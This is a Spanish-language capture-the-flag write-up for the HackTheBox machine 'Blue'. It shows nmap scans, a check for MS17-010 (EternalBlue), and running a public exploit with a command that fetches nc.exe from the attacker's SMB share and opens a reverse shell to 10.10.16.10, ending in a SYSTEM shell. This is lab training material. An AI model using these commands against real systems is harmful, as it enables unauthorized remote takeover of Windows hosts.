GITHUBHTB

Blue

Comenzamos la maquina enumerando los puertos abiertos con nmap, enumeraremos todos los puertos con el parámetro -p- y filtraremos solo los puertos que estén abiertos.

sudo nmap -p- --open -sS -min-rate 5000 -Pn -n 10.129.142.93 -oG allPorts

Aquí vemos los puertos abiertos de la maquina victima, vamos a lanzar una enumeración para que nos muestre más información de los servicios, como versiones, Dominio, Aplicación.

nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 10.129.142.93 -Pn -oN target

En el reporte de nmap, vemos que tenemos un windows 7 con un SMB abierto, vamos a lanzar nuevamente nmap con un script para detectar si es vulnerable a EternalBlue.

nmap -p445 --script smb-vuln-ms17-010 10.129.142.93

Buscamos la IDs que nos da nmap en Google. También podemos buscarlo por (ms17-010).

Permite a atacantes remotos ejecutar código arbitrario a través de paquetes diseñados, también conocida como "vulnerabilidad de ejecución remota de código SMB en Windows".

https://nvd.nist.gov/vuln/detail/cve-2017-0143

Vamos a ver si tenemos algún repositorio en github con un exploit para explotar el EternalBlue.

Descargamos el repositorio https://github.com/worawit/MS17-010 en nuestro equipo.

Tenemos varios archivos, vamos a ejecutar de primeras checker.py, en este caso si lo ejecutamos no nos dará la información que necesitamos.

Vamos a editar el archivo y simplemente le añadiremos un usuario "GUEST", ya que la conexión de invitados esta disponible.

Al volver a lanzarlo, vemos que la cosa cambia.

Tenemos varios pipes que podremos usar mas adelante. Ahora vamos a configurar el archivo zzz_exploit.py.

Marcamos todas las líneas de comandos y desmarcamos la línea de service_exec.

Recordar añadir el usuario GUEST como hicimos en el archivo checker.py y modificar la línea con el comando que queramos que ejecute la maquina victima.

service_exec(conn, r'cmd /c \\10.10.16.10\smbFolder\nc.exe -e cmd 10.10.16.10 443')

Ahora tenemos que buscar el ejecutable nc.exe y compartir un recurso compartido para que la maquina victima lo ejecute y nos de una reverse shell.

impacket-smbserver smbFolder $(pwd) -smb2support

Ahora nos ponemos en escucha con netcat, y ejecutamos el archivo zzz_exploit.py con un pipe valido, que hemos obtenido anteriormente con el checker.py, en este caso usare el pipe samr.

python2.7 zzz_exploit.py 10.129.142.93 samr

Conseguimos una reverse shell como nt authority\system.

AnteriorLegacySiguienteLame

Última actualización